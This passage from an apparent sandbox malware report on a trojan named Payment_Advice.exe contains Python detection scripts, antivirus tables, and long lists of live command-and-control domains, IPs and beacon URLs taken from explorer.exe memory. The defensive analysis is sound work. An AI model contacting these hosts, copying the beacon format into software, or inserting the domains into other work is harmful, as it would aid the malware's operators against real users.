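        if name in SCRIPT_HOSTS and USER_WRITABLE.match(parent.image):
            hits.append((e.pid, "script_host_from_user_writable_parent"))
        # RegSvcs.exe is a signed .NET utility; here its parent is the dropped file in %TEMP%.
        if name in DOTNET_HOSTS and not SYSTEM_DIRS.match(parent.image):
            hits.append((e.pid, "dotnet_host_from_untrusted_parent"))
        # ipconfig.exe somewhere below a script host (cmd.exe in between does not hide it).
        if name in RECON:
            ancestors = ancestry(events, e.ppid).lower().split(" > ")
            if any(a in SCRIPT_HOSTS for a in ancestors):
                hits.append((e.pid, "recon_under_script_host"))
    return hits


if __name__ == "__main__":
    for pid, rule in flag(EVENTS):
        print(f"{rule:40} {ancestry(EVENTS, pid)}")
```

Parent-path checks rather than process-name allow-lists are what keep the RegSvcs.exe rule usable: the binary itself is legitimate and signed, so the only signal is who started it and from where.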

Source | Detection | Scanner | Label | Link
Payment_Advice.exe | 45% | ReversingLabs | Win32.Trojan.Nymeria |
Payment_Advice.exe | 49% | Virustotal | | Browse

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmp | 13% | ReversingLabs | |

No Antivirus matches
Source | Detection | Scanner | Label | Link
www.91fulizifen.com | 0% | Virustotal | | Browse
www.tygyro.com | 0% | Virustotal | | Browse
www.brownkrosshui.com | 0% | Virustotal | | Browse
www.usbulletinnow.com | 0% | Virustotal | | Browse
Source | Detection | Scanner | Label | Link
http://schemas.micro | 0% | URL Reputation | safe |
http://www.91fulizifen.com/hesf/www.pendletonofficial.shop | 0% | Avira URL Cloud | safe |
http://www.usbulletinnow.comReferer: | 0% | Avira URL Cloud | safe |
http://www.usbulletinnow.com | 0% | Avira URL Cloud | safe |
http://www.usbulletinnow.com/hesf/ | 0% | Avira URL Cloud | safe |
http://www.usbulletinnow.com | 0% | Virustotal | | Browse
http://www.usbulletinnow.com/hesf/ | 0% | Virustotal | | Browse
http://www.schistdisc.com/hesf/www.1320detailingsupplies.com | 0% | Avira URL Cloud | safe |
http://www.im-newbie-journal.online | 0% | Avira URL Cloud | safe |
http://www.im-newbie-journal.online/hesf/www.tygyro.com | 0% | Avira URL Cloud | safe |
https://powerpoint.office.comer | 0% | Avira URL Cloud | safe |
http://www.pendletonofficial.shopReferer: | 0% | Avira URL Cloud | safe |
http://www.shayun.net/hesf/www.brownkrosshui.com | 0% | Avira URL Cloud | safe |
http://www.pendletonofficial.shop/hesf/www.shayun.net | 0% | Avira URL Cloud | safe |
http://www.homespy.net/hesf/ | 0% | Avira URL Cloud | safe |
http://www.jf66899j.com/hesf/www.jimenezfarmersinsurance.shop | 0% | Avira URL Cloud | safe |
http://www.othersidewear.com/hesf/www.91fulizifen.com | 0% | Avira URL Cloud | safe |
http://www.brownkrosshui.com/hesf/?jBZ=Zexu6rzcFbxF4r/yRE1P6uhuDniKqQl2K3Z2GVMnXCfVfpJX9615KGPJ2pRkkggZfWm9&Gvw=T4RpitPpFtBLx | 0% | Avira URL Cloud | safe |
http://www.homespy.net/hesf/ | 1% | Virustotal | | Browse
http://www.jimenezfarmersinsurance.shop/hesf/ | 0% | Avira URL Cloud | safe |
http://www.microsoft.c | 0% | Avira URL Cloud | safe |
http://www.tygyro.com/hesf/?jBZ=C6m+T/QSDYRxkia6wo2b10sg9WxaAAR9Ewn+rwYRRUW3VljC+LgrolCw9oI9hSyVjjh+&Gvw=T4RpitPpFtBLx | 0% | Avira URL Cloud | safe |
http://www.im-newbie-journal.online/hesf/ | 0% | Avira URL Cloud | safe |
http://www.svgco.lifeReferer: | 0% | Avira URL Cloud | safe |
http://www.1320detailingsupplies.com | 0% | Avira URL Cloud | safe |
http://www.brownkrosshui.comReferer: | 0% | Avira URL Cloud | safe |
http://www.jimenezfarmersinsurance.shopReferer: | 0% | Avira URL Cloud | safe |
http://www.1320detailingsupplies.com/hesf/ | 0% | Avira URL Cloud | safe |
http://www.jimenezfarmersinsurance.shop/hesf/ | 1% | Virustotal | | Browse
http://www.pendletonofficial.shop/hesf/ | 0% | Avira URL Cloud | safe |
http://www.othersidewear.comReferer: | 0% | Avira URL Cloud | safe |
http://www.tygyro.com/hesf/www.87b52.club | 0% | Avira URL Cloud | safe |
http://www.87b52.club | 0% | Avira URL Cloud | safe |
http://www.87b52.clubReferer: | 0% | Avira URL Cloud | safe |
http://www.pendletonofficial.shop | 0% | Avira URL Cloud | safe |
http://www.othersidewear.com/hesf/?jBZ=szcn2kpEQ6L2Syu9mG2pKozAyrZLMpz3ThmLak2r9KpoKfLz6EjH9XrJVzpw+e6nWP1B&Gvw=T4RpitPpFtBLx | 0% | Avira URL Cloud | safe |
http://www.pancakesandwaflesbeverages.netReferer: | 0% | Avira URL Cloud | safe |
http://www.schistdisc.comReferer: | 0% | Avira URL Cloud | safe |
http://www.87b52.club/hesf/ | 0% | Avira URL Cloud | safe |
http://www.homespy.netReferer: | 0% | Avira URL Cloud | safe |
http://www.jf66899j.comReferer: | 0% | Avira URL Cloud | safe |
http://www.1320detailingsupplies.comReferer: | 0% | Avira URL Cloud | safe |
http://www.brownkrosshui.com | 0% | Avira URL Cloud | safe |
http://www.schistdisc.com/hesf/ | 0% | Avira URL Cloud | safe |
http://www.jf66899j.com | 0% | Avira URL Cloud | safe |
http://www.schistdisc.com | 0% | Avira URL Cloud | safe |
http://www.im-newbie-journal.onlineReferer: | 0% | Avira URL Cloud | safe |
http://www.jf66899j.com/hesf/ | 0% | Avira URL Cloud | safe |
http://www.shayun.net/hesf/?jBZ=rBBm79yWj/0scTu35nBTjefHB3yHFR/9uN8IXoi0DRbgMbd2cnMvsZYXFupsHQ3mqy7J&Gvw=T4RpitPpFtBLx | 0% | Avira URL Cloud | safe |
http://www.91fulizifen.com | 0% | Avira URL Cloud | safe |
http://www.brownkrosshui.com/hesf/ | 0% | Avira URL Cloud | safe |
http://www.brownkrosshui.com/hesf/www.usbulletinnow.com | 0% | Avira URL Cloud | safe |
http://www.87b52.club/hesf/?jBZ=Yl+PPX/Fw39a2JSf74vYq4wd93NvWGX3Wu4/ealva/bJOpk7yrAe/vXYfNyLtgAB6gnO&Gvw=T4RpitPpFtBLx | 0% | Avira URL Cloud | safe |
http://www.1320detailingsupplies.com/hesf/www.jf66899j.com | 0% | Avira URL Cloud | safe |
http://www.svgco.life | 0% | Avira URL Cloud | safe |
http://www.tygyro.com/hesf/ | 0% | Avira URL Cloud | safe |
http://www.tygyro.comReferer: | 0% | Avira URL Cloud | safe |
http://www.svgco.life/hesf/ | 0% | Avira URL Cloud | safe |
http://www.jimenezfarmersinsurance.shop | 0% | Avira URL Cloud | safe |
http://www.pancakesandwaflesbeverages.net/hesf/www.schistdisc.com | 0% | Avira URL Cloud | safe |
http://www.svgco.life/hesf/www.pancakesandwaflesbeverages.net | 0% | Avira URL Cloud | safe |
http://www.91fulizifen.com/hesf/?jBZ=d2AGz1H3YsI9kghQJOJ7DZyuiCPgqoB+sSxuqf6m27exoGivXrHz5sUA11+t0RjRixK2&Gvw=T4RpitPpFtBLx | 0% | Avira URL Cloud | safe |
www.jimenezfarmersinsurance.shop/hesf/ | 0% | Avira URL Cloud | safe |
http://www.91fulizifen.comReferer: | 0% | Avira URL Cloud | safe |
http://ns.adobeS | 0% | Avira URL Cloud | safe |
http://www.pancakesandwaflesbeverages.net/hesf/ | 0% | Avira URL Cloud | safe |
http://www.91fulizifen.com/hesf/ | 0% | Avira URL Cloud | safe |
http://www.87b52.club/hesf/www.svgco.life | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.91fulizifen.com | 142.234.186.98 | true | true | | unknown
parkingpage.namecheap.com | 91.195.240.19 | true | false | | high
www.othersidewear.com | 77.222.40.147 | true | true | | unknown
overdue.aliyun.com | 170.33.13.246 | true | false | | high
usbulletinnow.com | 62.72.50.244 | true | true | | unknown
www.im-newbie-journal.online | 66.96.160.140 | true | true | | unknown
www.tygyro.com | 103.224.182.242 | true | true | | unknown
www.87b52.club | 75.2.115.196 | true | true | | unknown
www.brownkrosshui.com | unknown | unknown | true | | unknown
www.pendletonofficial.shop | unknown | unknown | true | | unknown
www.usbulletinnow.com | unknown | unknown | true | | unknown
www.shayun.net | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.brownkrosshui.com/hesf/?jBZ=Zexu6rzcFbxF4r/yRE1P6uhuDniKqQl2K3Z2GVMnXCfVfpJX9615KGPJ2pRkkggZfWm9&Gvw=T4RpitPpFtBLx | true | Avira URL Cloud: safe | unknown
http://www.tygyro.com/hesf/?jBZ=C6m+T/QSDYRxkia6wo2b10sg9WxaAAR9Ewn+rwYRRUW3VljC+LgrolCw9oI9hSyVjjh+&Gvw=T4RpitPpFtBLx | true | Avira URL Cloud: safe | unknown
http://www.othersidewear.com/hesf/?jBZ=szcn2kpEQ6L2Syu9mG2pKozAyrZLMpz3ThmLak2r9KpoKfLz6EjH9XrJVzpw+e6nWP1B&Gvw=T4RpitPpFtBLx | true | Avira URL Cloud: safe | unknown
http://www.shayun.net/hesf/?jBZ=rBBm79yWj/0scTu35nBTjefHB3yHFR/9uN8IXoi0DRbgMbd2cnMvsZYXFupsHQ3mqy7J&Gvw=T4RpitPpFtBLx | true | Avira URL Cloud: safe | unknown
http://www.87b52.club/hesf/?jBZ=Yl+PPX/Fw39a2JSf74vYq4wd93NvWGX3Wu4/ealva/bJOpk7yrAe/vXYfNyLtgAB6gnO&Gvw=T4RpitPpFtBLx | true | Avira URL Cloud: safe | unknown
http://www.91fulizifen.com/hesf/?jBZ=d2AGz1H3YsI9kghQJOJ7DZyuiCPgqoB+sSxuqf6m27exoGivXrHz5sUA11+t0RjRixK2&Gvw=T4RpitPpFtBLx | true | Avira URL Cloud: safe | unknown
www.jimenezfarmersinsurance.shop/hesf/ | true | Avira URL Cloud: safe | low
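Every beacon in the tables above has the same shape, http://<host>/hesf/?jBZ=<base64 blob>&Gvw=T4RpitPpFtBLx, and the strings recovered from explorer.exe memory also carry two artifacts: one config domain glued to the next (http://www.tygyro.com/hesf/www.87b52.club), and a host glued to a following Referer: header. The Python below is an added example, not code from this report or from Joe Sandbox; it classifies such strings and pulls the C2 domain list out of them, using a handful of URLs copied from the tables as constructed input. That the four-character path token and the two short query names are per-build constants, so that the structure rather than the literal token is what to match, is an assumption made here about the family and not something the report states; the observed token is kept only as a label. Hosts that appear without the token path (the Referer: artifacts, the truncated http://www.microsoft.c) are deliberately not promoted to indicators.

```python
import re
from urllib.parse import urlsplit

# Strings copied from this report's URL tables (constructed input for the example).
OBSERVED = [
    "http://www.tygyro.com/hesf/?jBZ=C6m+T/QSDYRxkia6wo2b10sg9WxaAAR9Ewn+rwYRRUW3VljC+LgrolCw9oI9hSyVjjh+&Gvw=T4RpitPpFtBLx",
    "http://www.87b52.club/hesf/?jBZ=Yl+PPX/Fw39a2JSf74vYq4wd93NvWGX3Wu4/ealva/bJOpk7yrAe/vXYfNyLtgAB6gnO&Gvw=T4RpitPpFtBLx",
    "http://www.tygyro.com/hesf/www.87b52.club",        # two config domains glued together
    "http://www.87b52.club/hesf/www.svgco.life",
    "http://www.svgco.life/hesf/",
    "www.jimenezfarmersinsurance.shop/hesf/",           # scheme missing in the dump
    "http://www.othersidewear.comReferer:",             # host glued to the next header name
    "http://www.microsoft.c",                           # truncated, not attributable
    "https://powerpoint.office.comer",
    "https://api.msn.com:443/v1/news/Feed/Windows?",    # explorer.exe's own strings
]

# Assumption: a 4-char path token, and a two-parameter query whose first value is a
# long base64 blob and whose second is a short alphanumeric tag.
TOKEN_PATH = re.compile(r"^/(?P<tok>[a-z0-9]{4})/$")
GLUED_PATH = re.compile(r"^/(?P<tok>[a-z0-9]{4})/(?P<next>www\.[a-z0-9.-]+)$")
BLOB = re.compile(r"^[A-Za-z0-9+/]{32,}={0,2}$")
TAG = re.compile(r"^[A-Za-z0-9]{4,24}$")


def normalize(s):
    s = s.strip()
    if s.endswith("Referer:"):          # memory-dump artifact: URL ran into the next header
        s = s[: -len("Referer:")]
    if "://" not in s:
        s = "http://" + s
    return s


def split_query(qs):
    # parse_qsl would turn '+' into ' ' and corrupt the base64 blob, so split by hand.
    pairs = []
    for part in qs.split("&"):
        if part:
            k, _, v = part.partition("=")
            pairs.append((k, v))
    return pairs


def classify(raw):
    """Return (kind, token, hosts) with kind one of:
    beacon   full check-in URL (token path plus two-parameter query)
    glued    artifact with the next config domain appended to the token path
    path     bare token path without a query
    hostonly scheme and host only (not attributable without the token path)
    other    anything else"""
    u = urlsplit(normalize(raw))
    host = (u.hostname or "").lower()
    q = split_query(u.query)
    m = GLUED_PATH.match(u.path)
    if m:
        return ("glued", m["tok"], [host, m["next"]])
    m = TOKEN_PATH.match(u.path)
    if m and len(q) == 2 and BLOB.match(q[0][1]) and TAG.match(q[1][1]):
        return ("beacon", m["tok"], [host])
    if m and not q:
        return ("path", m["tok"], [host])
    if u.path in ("", "/") and not q:
        return ("hostonly", None, [host])
    return ("other", None, [host])


def c2_domains(urls):
    """Sorted domains tied to the token path; hostonly strings are excluded on purpose."""
    hosts = set()
    for raw in urls:
        kind, _, hs = classify(raw)
        if kind in ("beacon", "glued", "path"):
            hosts.update(hs)
    return sorted(hosts)


def campaign_tokens(urls):
    return {classify(raw)[1] for raw in urls if classify(raw)[1]}


if __name__ == "__main__":
    for raw in OBSERVED:
        print(f"{classify(raw)[0]:8} {raw}")
    print("tokens:", campaign_tokens(OBSERVED))
    print("C2 domains:", c2_domains(OBSERVED))
```

The glued strings matter more than they look: each one names the domain that follows in the configuration, so together they recover config entries that were never contacted during the run and would otherwise be missing from the DNS table.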
Name | Source | Malicious | Antivirus Detection | Reputation
https://powerpoint.office.comer | explorer.exe, 0000000F.00000002.3864604244.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1596839591.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.91fulizifen.com/hesf/www.pendletonofficial.shop | explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.usbulletinnow.comReferer: | explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://android.notify.windows.com/iOSA4 | explorer.exe, 0000000F.00000003.2285903553.000000000BCB4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3864604244.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077912790.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3078591847.000000000BCBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2286640369.000000000BCBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1596839591.000000000BC80000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV | explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://www.usbulletinnow.com/hesf/ | explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://www.usbulletinnow.com | explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world | explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://api.msn.com:443/v1/news/Feed/Windows? | explorer.exe, 0000000F.00000003.2284163967.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1592153566.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3856158250.00000000091FB000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://www.im-newbie-journal.online | explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.schistdisc.com/hesf/www.1320detailingsupplies.com | explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.im-newbie-journal.online/hesf/www.tygyro.com | explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://excel.office.com | explorer.exe, 0000000F.00000002.3864604244.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1596839591.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://www.msn.com/en-us/money/personalfinance/the-big-3-mistakes-financial-advisors-say-that-the-1 | explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://www.shayun.net/hesf/www.brownkrosshui.com | explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.autoitscript.com/autoit3/ | Payment_Advice.exe, 00000000.00000003.1414188164.000000000789D000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp.0.dr | false | | high
http://www.pendletonofficial.shopReferer: | explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.pendletonofficial.shop/hesf/www.shayun.net | explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.homespy.net/hesf/ | explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmp | false | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal | explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://www.jf66899j.com/hesf/www.jimenezfarmersinsurance.shop | explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.othersidewear.com/hesf/www.91fulizifen.com | explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.jimenezfarmersinsurance.shop/hesf/ | explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmp | false | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://www.microsoft.c | explorer.exe, 0000000F.00000003.2284163967.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1592153566.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3856158250.0000000009237000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.im-newbie-journal.online/hesf/ | explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://android.notify.windows.com/iOSd | explorer.exe, 0000000F.00000003.2285903553.000000000BCB4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3864604244.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077912790.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3078591847.000000000BCBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2286640369.000000000BCBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1596839591.000000000BC80000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://www.svgco.lifeReferer: | explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi | explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://www.1320detailingsupplies.com | explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.autoitscript.com/autoit3/J | explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://www.brownkrosshui.comReferer: | explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
